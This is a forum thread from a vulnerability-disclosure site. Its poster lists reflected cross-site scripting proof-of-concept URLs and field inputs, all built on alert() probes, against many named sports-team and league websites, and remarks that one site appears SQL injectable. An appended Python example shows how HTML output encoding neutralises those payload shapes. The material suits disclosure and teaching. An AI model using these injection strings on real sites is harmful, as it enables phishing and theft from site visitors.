sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Sport Teams XSS vulns...
Posted by: Mephisto
Date: March 02, 2007 12:05AM

Like millions of people, I love sports and I regularly go to my favorite team sites to catch up on the latest news. I also sign up for newsletters notifying me of the latest events. Thinking about this, though, brings up the definite possibility of targeted phishing attacks using these types of sites. So I decided I would check and see which sites had obvious XSS issues.

http://www.kcchiefs.com/news/features/ ("><script>alert('xss');</script> in "Chiefs Pulse" field)

http://www.buffalobills.com/includes/iframes/media_channels.jsp?search_terms=<script>alert('xss');</script>

http://www.miamidolphinsproshop.com/main_search.cfm ("><script>alert('xss');</script> in Item Description or Product #) Funny thing is they filter the search box...

http://www.patriots.com/search/index.cfm?ac=SearchResults&subnav=news&searchstring=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&PCID=41&PCID=47

http://proshop.bengals.com/istar.asp?a=6&id=11R1Q!REEB&csurl="><script>alert('xss');</script>

http://www.clevelandbrowns.com/fans/login.php ("><script>alert('xss');</script in email field)

http://news.steelers.com/article/search ('><script>alert('xss');</script> in search field)

http://www.houstontexans.com/news/index.php?section=<script>alert('xss');</script>

http://www.colts.com/ ("><script>alert('xss');</script> in search field)

http://www.titansproshop.com/main_search.cfm ("><script>alert('xss');</script> in item description field) Note: http://www.titansonline.com appears to be SQL injectable as well.

http://www.denverbroncos.com/page.php?id=349&videoID=1617&type=broncosTV&year="><script>alert(1);</script>&month=

http://www.chargersproshop.com/main_search.cfm ("><script>alert('xss');</script> in Item Description field)

http://www.cowboysonlineproshop.com/main_search.cfm ("><script>alert('xss');</script> in Item Description field)

http://www.giants.com/search.asp?KEYWORDS=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&submit.x=8&submit.y=13

http://www.chicagobears.com/ ("><script>alert(1);</script> in search field)

http://www.detroitlionsstore.com/search.cfm (<script>alert(1);</script> in search field)

http://www.atlantafalcons.com/includes/display/emailArticle.jsp?url=$2Fteam%2Farticle.jsp%3Fid%3D&title="><script>alert(1);</script>

http://shop.panthers.com/product/search/?SearchText=%27%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&orderby=Name&lowPrice=&highPrice=

http://www.neworleanssaints.com/searchresult.cfm?md=sitesearch&source="><script>alert(1);</script>&searchkeyword=test

http://www.cardinalsproshop.com/main_search.cfm ("><script>alert(1);</script> in Item Description field)

http://www.stlouisrams.com/team/players/"><script>alert(1);</script>

http://49ers.com/pressbox/news_detail.php?PRKey=2879&section=</title><script>alert(1);</script>



Edited 3 time(s). Last edit at 03/02/2007 12:27AM by Mephisto.

Re: Sport Teams XSS vulns...
Posted by: Mephisto
Date: March 02, 2007 10:58PM

http://www.nba.com/statistics/player/Scoring.jsp?league=00&season=12006&conf="><script>alert(1);</script>&position=0&splitType=9&splitScope=GAME&qualified=N&yearsExp=-1&splitDD=

http://mlb.mlb.com/stats/sortable_player_stats.jsp?print=""><script>alert(1);</script> <-- it throws numerous alerts

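The payload prefixes in the posts above (`">`, `'>`, `</title>`, or none) each correspond to a different output context the reflected value lands in. The following is an added example, not part of the original posts or any listed site's code: it renders those four payload shapes into constructed, hypothetical templates and counts the `<script>` tags a parser sees with and without output encoding.

```python
import html
from html.parser import HTMLParser

# Constructed templates (hypothetical markup, not taken from any listed site),
# one per output context implied by the payload prefixes in the thread.
TEMPLATES = {
    "double-quoted attribute": '<input name="q" value="{v}">',
    "single-quoted attribute": "<input name='q' value='{v}'>",
    "element body": "<p>Results for {v}</p>",
    "title element": "<title>News: {v}</title>",
}

# Payload shapes quoted in the thread, matched to the context they break out of.
PAYLOADS = {
    "double-quoted attribute": '"><script>alert(1);</script>',
    "single-quoted attribute": "'><script>alert(1);</script>",
    "element body": "<script>alert(1);</script>",
    "title element": "</title><script>alert(1);</script>",
}

class ScriptCounter(HTMLParser):
    """Counts <script> start tags that survive as real markup."""
    def __init__(self):
        super().__init__()
        self.scripts = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1

def count_scripts(markup):
    parser = ScriptCounter()
    parser.feed(markup)
    parser.close()
    return parser.scripts

def render(context, value, encode):
    # encode=False reflects the value raw; encode=True escapes & < > " and '
    safe = html.escape(value, quote=True) if encode else value
    return TEMPLATES[context].format(v=safe)

def audit():
    """Return {context: (scripts when reflected raw, scripts when encoded)}."""
    return {ctx: (count_scripts(render(ctx, p, False)),
                  count_scripts(render(ctx, p, True)))
            for ctx, p in PAYLOADS.items()}

if __name__ == "__main__":
    for ctx, (raw, enc) in audit().items():
        print(f"{ctx:26} raw={raw} encoded={enc}")
```

Encoding at the point of output covers every field that reaches the template, which is the gap when only one input (such as a search box) is filtered. `html.escape` suits HTML body text and quoted attribute values; values placed in script blocks, URLs, or unquoted attributes need their own context-specific encoding.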